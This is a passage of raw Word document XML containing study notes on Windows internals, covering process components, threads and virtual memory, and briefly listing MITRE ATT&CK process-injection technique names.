          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50DC4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Process Hollowing (</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C50DC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>T1055.012</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C50DC4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244560FB" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C50DC4" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50DC4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Process Masquerading (</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C50DC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>T1055.013</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C50DC4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A63B14" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00975FBC" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>High Level Process Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48352317" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="001B7CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Private Virtual Address Space:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Virtual memory addresses that the process is allocated (virtual mean start &amp; end of process space as process see but in real hard drive maybe it is on other address).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3990055E" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="001B7CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Executable Program</w:t>
      </w:r>
      <w:r>
        <w:t>: Defines code and data stored in the virtual address space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652AC315" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="001B7CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Open Handles</w:t>
      </w:r>
      <w:r>
        <w:t>: Defines handles to system resources accessible to the process (</w:t>
      </w:r>
      <w:r w:rsidRPr="001A128D">
        <w:t>system resources that a process has open and is actively using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (include: files, registry keys, </w:t>
      </w:r>
      <w:r w:rsidRPr="001A128D">
        <w:t>open sockets, ports</w:t>
      </w:r>
      <w:r>
        <w:t>, Threads</w:t>
      </w:r>
      <w:r w:rsidRPr="001A128D">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348AF7F6" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="001B7CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Context:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> security information (the access token defines the user, security groups, privileges)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52577175" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="001B7CEA" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B7CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Unique numerical identifier of the process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA86E37" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="001B7CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Threads:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Section of a process scheduled for execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B993694" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00975FBC" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50DC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ower </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50DC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>evel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50DC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>process as it as in its virtual address space.  (its look in memory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCFBCAF" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="604345A7" wp14:editId="0FD3FFD2">
            <wp:extent cx="4162926" cy="1977835"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="544968754"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8754" name="Picture 1" descr="A screenshot of a docum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9568" cy="1985742"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F86553A" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50DC4">
        <w:t xml:space="preserve"> processes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50DC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task Manager</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or in Advanced easy way by using one of these tools: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50DC4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00C50DC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Process Hacker 2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C50DC4">
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00C50DC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Process </w:t>
        </w:r>
        <w:r w:rsidRPr="00C50DC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>E</w:t>
        </w:r>
        <w:r w:rsidRPr="00C50DC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>xplorer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C50DC4">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00C50DC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Procmon</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50DC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System Informer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from official MS Store </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50DC4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8048C4" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009"/>
    <w:p w14:paraId="777477F8" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FB1C72" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB1C72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2B4D2B" w14:textId="51FFD3D4" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00A006D1">
        <w:t>Thread is an executable unit employed by a process</w:t>
      </w:r>
      <w:r w:rsidRPr="001378B6">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001378B6">
        <w:t>and scheduled based on device factors.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A006D1">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00C57C02" w:rsidRPr="00A006D1">
        <w:t>Controlling</w:t>
      </w:r>
      <w:r w:rsidRPr="00A006D1">
        <w:t xml:space="preserve"> the execution of a process."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Consider it a Sub Process Under Main Process. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3C4FFF" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00333C3D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Chrome is the </w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each </w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>tab</w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>extension</w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> might be a </w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>thread</w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D5E09F" w14:textId="396EB907" w:rsidR="00C00009" w:rsidRDefault="00C57C02" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>The processor</w:t>
      </w:r>
      <w:r w:rsidR="00C00009">
        <w:t xml:space="preserve"> exactly execute</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C00009">
        <w:t xml:space="preserve"> the process as a collection of Threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06171EB0" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="009B220E">
        <w:t>Threads share the same details and resources as their parent process, such as code, global variables, etc.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> but have more of its </w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:t>unique values and data</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40010135" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="009B220E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5309E132" wp14:editId="3D112710">
            <wp:extent cx="4587240" cy="1746680"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
            <wp:docPr id="7545669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6967" name="Picture 1" descr="A white background with black text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4604299" cy="1753176"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01981BBC" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="009B220E" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="009B220E">
        <w:t xml:space="preserve">All threads are inside the </w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>same process</w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436CA7BB" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="009B220E" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="009B220E">
        <w:t xml:space="preserve">Each thread has </w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>its own stack</w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:t>, context, and local data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6B7FC3" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="009B220E" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="009B220E">
        <w:t xml:space="preserve">All threads can access the </w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shared code/data</w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:t xml:space="preserve"> of the process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49111E14" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="009B220E" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>The hardware thread</w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a feature of modern CPUs that allows a single physical core to run </w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>multiple software threads at the same time</w:t>
      </w:r>
      <w:r w:rsidRPr="009B220E">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BBAE9F" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B26DCEF" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009"/>
    <w:p w14:paraId="0CF68821" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001378B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Virtual Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D12284" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="009008E0" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="561459DE" wp14:editId="65C8774F">
            <wp:extent cx="2880360" cy="2104992"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1078142651" name="Picture 1" descr="A diagram of different colored cyli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2651" name="Picture 1" descr="A diagram of different colored cylind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174" cy="2108510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A261B90" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>The Idea that: each Process have its own virtual address that it knows and work based on it, but in physical memory this address may be saved in different places.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FC3595" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="001378B6" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="009008E0">
        <w:t>Virtual memory provides each process with a </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="009008E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>private virtual address space</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009008E0">
        <w:t xml:space="preserve">. A </w:t>
      </w:r>
      <w:r w:rsidRPr="009008E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>memory manager</w:t>
      </w:r>
      <w:r w:rsidRPr="009008E0">
        <w:t xml:space="preserve"> is used to translate virtual addresses to physical addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A07FE8" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2857948A" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="009008E0">
        <w:t>The theoretical maximum virtual address space is 4 GB on a 32-bit x86 system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EA40E2" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00843AFC" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843AFC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This address space is split in half, the lower half (</w:t>
      </w:r>
      <w:r w:rsidRPr="00843AFC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000000 - 0x7FFFFFFF</w:t>
      </w:r>
      <w:r w:rsidRPr="00843AFC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) is allocated to processes as mentioned above. The upper half (</w:t>
      </w:r>
      <w:r w:rsidRPr="00843AFC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x80000000 - 0xFFFFFFFF</w:t>
      </w:r>
      <w:r w:rsidRPr="00843AFC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) is allocated to OS memory utilization. Administrators can alter this allocation layout for applications that require a larger address space through settings </w:t>
      </w:r>
      <w:r w:rsidRPr="00843AFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00843AFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>increaseUserVA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00843AFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) or the </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00843AFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>AWE (Address Windowing Extensions)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00843AFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC7FFC6" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
